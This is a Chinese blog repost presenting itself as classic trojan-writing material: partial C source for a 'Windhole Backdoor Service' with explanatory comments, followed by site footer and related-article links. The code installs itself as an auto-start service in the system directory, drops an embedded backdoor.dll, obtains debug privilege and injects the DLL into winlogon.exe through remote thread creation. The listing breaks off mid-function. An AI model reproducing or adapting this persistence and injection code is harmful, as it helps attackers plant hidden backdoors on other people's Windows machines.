寫木馬的經典,dll插入系統程式的原始碼(轉)
寫木馬的經典,dll插入系統程式的原始碼(轉)[@more@] 程式碼不全,這是涉及主要的部分!有詳細的註釋 裡面有涉及普通常用且又重要的程式設計思路! /*--------------------------------------------------------------------- //mysvr.c //Coder: sjdf //E-mail: sjdf1@163.com //Create date: 2002.8.11 //Last modify date: 2003.10.28 //Test platform: Win2000 Adv Server + sp4 ---------------------------------------------------------------------*/ //Header #include "bkdlldata.h" #include #include #include #include #include //--------------------------------------------------------------------- //Global constant char SERVICENAME[9] = "windhole"; const char DISPLAYNAME[33] = "Windhole Backdoor Service"; const char SRVFILENAME[13] = "windhole.exe"; const char BDRFILENAME[13] = "backdoor.dll"; const char DESTPROC[19] = "winlogon.exe"; //--------------------------------------------------------------------- //Glabal variable SERVICE_STATUS MyServiceStatus; SERVICE_STATUS_HANDLE MyServiceStatusHandle; int WillStop = 0; //--------------------------------------------------------------------- //Function declaration int AddPrivilege(const char *Name); void MyServiceStart (int argc, char *argv[]); void MyServiceCtrlHandler (DWORD opcode); DWORD MyWrokThread(void); DWORD ProcessToPID(const char *InputProcessName); //--------------------------------------------------------------------- //Function definition int main(int argc,char *argv[]) { //如果引數為“-service”就作為服務啟動 if ((argc >= 2) && (!lstrcmp(argv[1],"-service"))) { SERVICE_TABLE_ENTRY DispatchTable[] = { {SERVICENAME, (LPSERVICE_MAIN_FUNCTION)MyServiceStart}, {NULL, NULL} }; if (!StartServiceCtrlDispatcher( DispatchTable)) { return 1; } return 0; } //否則就自動安裝服務 //複製自身到系統目錄 char DestName[MAX_PATH + 1]; char NowName[MAX_PATH + 1]; ZeroMemory(DestName,MAX_PATH + 1); ZeroMemory(NowName,MAX_PATH + 1); if (!GetSystemDirectory(DestName,MAX_PATH)) { printf("GetSystemDirectory() error = %d
Install failure!
",GetLastError()); return 1; } lstrcat(DestName,""); lstrcat(DestName,SRVFILENAME); if (!GetModuleFileName(NULL,NowName,MAX_PATH)) { printf("GetModuleFileName() error = %d
Install failure!
",GetLastError()); return 1; } if (!CopyFile(NowName,DestName,0)) { printf("CopyFile() error = %d
Install failure!
",GetLastError()); return 1; } //安裝服務 SC_HANDLE newService, scm; //連線SCM if (!(scm = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE))) { printf("OpenSCManager() error = %d
Install failure!
",GetLastError()); return 1; } //當作為服務啟動時加上“-service”引數 lstrcat(DestName," -service"); if (!(newService = CreateService(scm, SERVICENAME, DISPLAYNAME, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, DestName, NULL, NULL, NULL, NULL, NULL))) { printf("CreateService() error = %d
Install failure!
",GetLastError()); } else { printf("Install success!
"); char *pra[] = {"-service", ""}; if (!StartService(newService,1,(const char **)pra)) { printf("StartService() error = %d
Start service failure!
",GetLastError()); } else { printf("Start service Success!
"); } } CloseServiceHandle(newService); CloseServiceHandle(scm); return 0; } //--------------------------------------------------------------------- DWORD MyWorkThread(void) { Sleep(4000); FILE *fp; if ((fp = fopen(BDRFILENAME,"wb")) == NULL) { WillStop = 1; return 1; } fwrite(data1,sizeof(data1),1,fp); fwrite(data2,sizeof(data2),1,fp); fwrite(data3,sizeof(data3),1,fp); fwrite(data4,sizeof(data4),1,fp); fwrite(data5,sizeof(data5),1,fp); fclose(fp); char FullName[MAX_PATH + 1]; ZeroMemory(FullName,MAX_PATH + 1); GetSystemDirectory(FullName,MAX_PATH); lstrcat(FullName,""); lstrcat(FullName,BDRFILENAME); //如果是要開啟系統程式,一定要先申請debug許可權 AddPrivilege(SE_DEBUG_NAME); HANDLE hRemoteProcess = NULL; DWORD Pid = ProcessToPID(DESTPROC); if ((hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允許遠端建立執行緒 PROCESS_VM_OPERATION | //允許遠端VM操作 PROCESS_VM_WRITE | //允許遠端VM寫 PROCESS_VM_READ, //允許遠端VM讀 0, Pid)) == NULL) { WillStop = 1; return 1; } char *pDllName = NULL; if ((pDllName = (char *)VirtualAllocEx( hRemoteProcess, NULL, lstrlen(FullName) + 1, MEM_COMMIT, PAGE_READWRITE)) == NULL) { CloseHandle(hRemoteProcess); WillStop = 1; return 1; } //使用WriteProcessMemory函式將DLL的路徑名複製到遠端程式的記憶體空間 if (WriteProcessMemory(hRemoteProcess, pDllName, FullName, lstrlen(FullName), NULL) == 0) { VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE); CloseHandle(hRemoteProcess); WillStop = 1; return 1; } //計算LoadLibraryA的入口地址 PTHREAD_START_ROUTINE pfnStartAddr = NULL; if ((pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress( GetModuleHandle(TEXT("kernel32")), "LoadLibraryA")) == NULL) { VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE); CloseHandle(hRemoteProcess); WillStop = 1; return 1; } DWORD ThreadId = 0; CreateRemoteThread(hRemoteProcess, //被嵌入的遠端程式 NULL, 0, pfnStartAddr, //LoadLibraryA的入口地址 pDllName, 0, &ThreadId); CloseHandle(hRemoteProcess); WillStop = 1; return 0; } //--------------------------------------------------------------------- void MyServiceStart (int argc, char *argv[]) { if (!(MyServiceStatusHandle = RegisterServiceCtrlHandler(SERVICENAME,(LPHANDLER_FUNCTION)MyServiceCtrlHandler))) { return; } MyServiceStatus.dwServiceType = SERVICE_WIN32; MyServiceStatus.dwCurrentState = SERVICE_START_PENDING; MyServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE; MyServiceStatus.dwWin32ExitCode = 0; MyServiceStatus.dwServiceSpecificExitCode = 0; MyServiceStatus.dwCheckPoint = 0; MyServiceStatus.dwWaitHint = 0; if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus)) { return; } DWORD Threadid; // Initialization code goes here. Handle error condition if (!CreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)MyWorkThread,NULL, 0, &Threadid)) { MyServiceStatus.dwCurrentState = SERVICE_STOPPED; MyServiceStatus.dwCheckPoint = 0; MyServiceStatus.dwWaitHint = 0; MyServiceStatus.dwWin32ExitCode = GetLastError(); MyServiceStatus.dwServiceSpecificExitCode = GetLastError();
·上一篇:·下一篇:
| 最新更新 | ||
| ······························ | ||
|
| ||
| | | | | | | | | ||
|
| ||
| Copyright © 2004 - 2007 All Rights Reserved
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10763080/viewspace-970138/,如需轉載,請註明出處,否則將追究法律責任。 
請登入後發表評論
登入
全部評論
北京盛拓優訊資訊科技有限公司. 版權所有 京ICP備16024965號-8 北京市公安局海淀分局網監中心備案編號:11010802021510 niuxiaotong@pcpop.com 17352615567 未成年人舉報專區 廣播電視節目製作經營許可證(京) 字第1234號 中國網際網路協會會員 | ||
相關文章
- 檔案關聯型木馬的程式設計思路 (轉)程式設計
- 一個不坐旋轉木馬的朋友
- 網路駭客欺騙執行木馬的方法!(轉)
- 非常經典的UNIX系統調優的文章(轉)
- 【經典演算法問題】馬的遍歷【回溯】演算法
- 經典作業系統教材中的LRU演算法的自編c++實現及原始碼。 (轉)作業系統演算法C++原始碼
- 區別木馬與病毒,以及識別與防治木馬的方法
- 使用開原始碼寫linux程式(轉)原始碼Linux
- 經典T-SQL程式碼SQL
- 【Java】經典示例程式碼Java
- 傳統的webCMS系統如何做到經典?Web
- 微信活碼系統程式原始碼原始碼
- 經典的反轉
- WindowsXP作業系統防火牆經典使用指南(轉)Windows作業系統防火牆
- 一個支付寶木馬的分析溯源之旅
- 一次minerd肉雞木馬的排查思路
- 如何修復被掛木馬的php網站PHP網站
- SQL Server是否有特洛伊木馬的測試SQLServer
- 為Linux 應用程式編寫 DLL(轉)Linux
- 巨經典論文!推薦系統經典模型Wide & Deep模型IDE
- android經典原始碼,很不錯的開源框架Android原始碼框架
- 網頁廣泛使用的經典程式碼網頁
- 寫給經常需要ghost linux系統的朋友(轉)Linux
- WINDWOS 系統程式DLL檔案注入。
- 【轉】編譯Android系統原始碼和核心原始碼編譯Android原始碼
- 主宰作業系統的經典演算法作業系統演算法
- 分散式系統的經典基礎理論分散式
- 經典演算法之折半插入排序演算法排序
- js高手進階之路:underscore原始碼經典(完)JS原始碼
- js高手進階之路:underscore原始碼經典(二)JS原始碼
- js高手進階之路:underscore原始碼經典(一)JS原始碼
- js高手進階之路:underscore原始碼經典(三)JS原始碼
- Java高精度定位系統原始碼 UWB定位系統原始碼 定位系統原始碼Java原始碼
- 遭遇 木馬 srpcss.dllRPCCSS
- Linux挖礦木馬的技術演進探討Linux
- C#網路程式設計經典程式碼C#程式設計
- 老馬的春天:SDWebImage原始碼詳細解讀系列Web原始碼
- Dominate【作業系統的經典演算法】作業系統演算法